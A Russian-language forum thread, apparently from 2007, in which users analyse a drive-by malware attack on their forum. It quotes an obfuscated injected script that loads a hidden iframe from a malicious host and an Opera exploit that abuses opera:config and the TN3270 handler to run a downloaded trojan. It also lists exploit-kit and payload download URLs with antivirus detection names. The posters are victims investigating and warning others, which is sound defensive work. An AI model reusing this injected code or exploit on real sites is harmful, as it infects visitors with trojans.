Интересно что же было с форумом в 27.09.07 после полуночи! Вместо html-кода был обычный двоичный беспредел...
Вот что мне выдало при попытке залогиниться: Code: nUnTnanonVnMninynIndnVnUnSn8n6nDnpnBnjnLnYnanUnjnOnMn6nKnxnJntnWnNnJncnxnBnYnanUnjnUnCnPnKnxntnxnmnGnlnXnKnxn9nhnRnanVn3ntnonOnznanJnJnSnOnVn3nznonMnUn6nxnBnYnanUnjnVnfnynKnxnrnenVncnznrnxnBnSnWnDnRnMnOn9ncn3n8nVnonOnMnMn7nSn3nonSn8nRn3nsJnnWnDnOnMn6nHnxnKnxnHnUnCnPnpnjnKnK что ЭТО такое?
Советую всем с фаерфоксом до 2.0.0.6 без плагинов - ну кроме noscript , шестым ие с плагинами quicktime,winzip,flash,yahoo,и оперой до 9.22 обновиться и поменять пароли
Когда заходил по http -> Что то типа ддоса, спуф днс и редирект на http://dodo32.org/505/Xp//file.php?q=o9 там трой-даунлоадер, а затем по порядку: redirect to http://dodo32.org/505/Xp/ (MPack) download http://dodo32.org/505/Xp/file.php (Avira = TR/PSW.LDPinch.TAW.334) who download http://dodo32.org/505/l32/0.jpg?0 ->TR/Crypt.XPACK.Gen http://dodo32.org/505/l32/0.jpg?1 ->TR/Dldr.Small.emg.31 http://dodo32.org/505/l32/0.jpg?2 (404) http://dodo32.org/505/l32/0.jpg?3 ->WORM/Wigon.AB http://dodo32.org/505/l32/0.jpg?4 ->WORM/Zhelatin.Gen http://dodo32.org/505/l32/0.jpg?5 (404) http://dodo32.org/505/l32/0.jpg?6 (404) http://dodo32.org/505/l32/0.jpg?7 (404) http://dodo32.org/505/l32/0.jpg?8 (404) http://dodo32.org/505/l32/0.jpg?9 (404) 0.jpg?1 download http://81.95.149.235/load/206.exe ->not detect http://81.95.149.235/load/m.exe ->TR/PSW.LdPinch.bdr.58 http://81.95.149.235/load/d.exe ->TR/Crypt.FKM.Gen 0.jpg?4 download http://mediacount.net/pic/search.jpg http://mediacount.net/pic/winlogon.jpg http://mediacount.net/pic/tibs.jpg http://mediacount.net/pic/tool.jpg http://mediacount.net/pic/proxy.jpg http://mediacount.net/pictures5/zgame1 http://mediacount.net/pictures5/zgame2 http://mediacount.net/pictures5/zgame3 http://mediacount.net/pictures5/zgame4 http://mediacount.net/pictures5/zgame5 http://mediacount.net/pictures1/ztool1 http://mediacount.net/pictures1/ztool2 http://mediacount.net/pictures1/ztool3 http://mediacount.net/pictures1/ztool4 etc. whois: Code: Found 0 websites with the IP 81.95.149.10 role: RBusiness Network Registry address: RBusiness Network address: The Century Tower Building address: Ricardo J. Alfari Avenue address: Panama City address: Republic of Panama тут тоже немного инфы по dodo32.org http://umaxforum.com/topic/9/23671/90/ ЗЫ Достать бы оунера...
Точно хек (учитывается браузер??): Code: <SCRIPT>function ubi(grS,Cey){ var jsw=new Date(), rKa= new Date(); rKa.setTime(jsw.getTime()+86400000); document.cookie = grS+"="+escape(Cey)+";expires="+rKa.toGMTString(); }var cog='s1fVsm';var rbq='1',CLD='update1.classictel.org';var tjM='/html/';if(document.cookie.indexOf(cog+'='+rbq) ==-1){var dlh=document.location.host;var avS= 'ht'+'tp:'+'//'+( dlh != ''?'':eCI()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+eCI() +'.' + CLD+tjM;var GdK=document.createElement('iframe');GdK.setAttribute ('src', avS);GdK.height=1;GdK.width=2;GdK.frameBorder = 0; try{ document.body.appendChild ( GdK); ubi(cog, rbq );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( GdK);ubi ( cog,rbq) ;} }function eCI(){ var zZS=24;var NTe="01234567890abcdef",EYy=""; for(Uzd=0; Uzd < zZS; Uzd++) EYy+= NTe.substr(Math.?oor(Math.random()*NTe.length),1,1); return EYy; }</SCRIPT> Как видно, адрес - _http://update1.classictel.org/html/ По этому адресу происходит переадресация на _http://dodo32.org/505/Xp/, где находится следующее: Code: <script> blank_iframe = document.createElement('iframe'); blank_iframe.src = 'about:blank'; blank_iframe.setAttribute('id', 'blank_iframe_window'); blank_iframe.setAttribute('style', 'display:none'); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\ config_iframe.setAttribute('id', 'config_iframe_window');\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement('script');\ cache_iframe = document.createElement('iframe');\ app_iframe.src = 'http://dodo32.org/505/Xp//file.php?q=o9';\ app_iframe.onload = function ()\ {\ cache_iframe.src = 'opera:cache';\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute('href', 'tn3270://nothing');\ app_link.click();\ setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script> Данный код, вероятно, должен сопоставить протоколу "tn3270:" приложение telnet.exe и скачать некий file.exe (Trojan-Downloader.Win32.Small.ert) отсюда: _http://dodo32.org/505/Xp//file.php?q=o9
интересно узнать, что за бага используеться=\ и как от нее закрыться... сегодня у меня на форуме началась та же херня.. те же файлы, те же хосты.. поделись соображениями..
хорошо я вчера лопатил.... спасся = а трухекерам этим не помешало бы на пальцах объяснить что нехорошо в кибервойны играть